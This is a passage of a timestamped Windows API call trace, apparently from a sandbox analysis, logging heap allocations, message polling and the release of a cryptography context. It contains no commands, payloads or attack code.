hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0265.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.476] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0265.476] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0265.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.476] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0265.478] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.478] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0265.478] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0265.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.479] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.479] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.480] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.480] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0265.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0265.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0265.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0265.483] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0265.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.484] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0265.486] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, 